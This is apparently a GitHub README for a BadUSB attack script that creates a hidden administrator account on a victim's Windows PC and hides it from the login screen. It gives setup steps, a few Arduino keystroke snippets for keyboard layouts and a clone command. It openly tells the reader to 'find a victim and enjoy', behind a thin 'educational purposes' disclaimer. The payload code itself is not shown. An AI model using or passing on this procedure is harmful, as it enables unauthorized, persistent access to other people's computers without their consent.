Everything in this repository is strictly for educational purposes. Notice I am not responsible for stolen data. You are responsible for your actions using developed script for BadUSB.
This script allows you to do all this :
- Create a hidden admin account
- Set interactive logon on : "Don't display last signed-in" to allow you to connect to the hidden account
Sometimes, you will see something like this :
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(173);
Keyboard.releaseAll();
This is only to write these characters : "@", "\". But it depends on the computer's layout, so adapt these characters thanks to this site and the sequence you actually use to wirte these characters with your keyboard. (or switch the keyboard layout to French).
For US layout you only have to replace by this for "\" :
Keyboard.press(92);
Keyboard.releaseAll();
And by this for "@" :
Keyboard.press(64);
Keyboard.releaseAll();
You can customize the delay according to the speed in which you plug the BadUSB.
When you plug the BadUSB in a PC you have to wait for the caps lock to flash to unplug it.
-
Have a BadUSB.
-
Install Arduino software here (if you have a BadUSB based on Arduino);
-
Have a victim with Windows OS installed in his PC.
- Download this repository;
Linux :
git clone https://github.com/tuconnaisyouknow/BadUSB_keyloggerInjector
cd BadUSB_keyloggerInjector
Windows : Click on green button on right top of main page. Then click on "Download Zip" and extract zip file.
-
You can edit the name and password of the hidden account here at line 56 or here at line 19;
-
Put the .ino or .txt file in your BadUSB;
-
Find a victim and enjoy !
- Turn off caps lock.
- Switch the keyboard layout to French (or adapt the code according to your layout).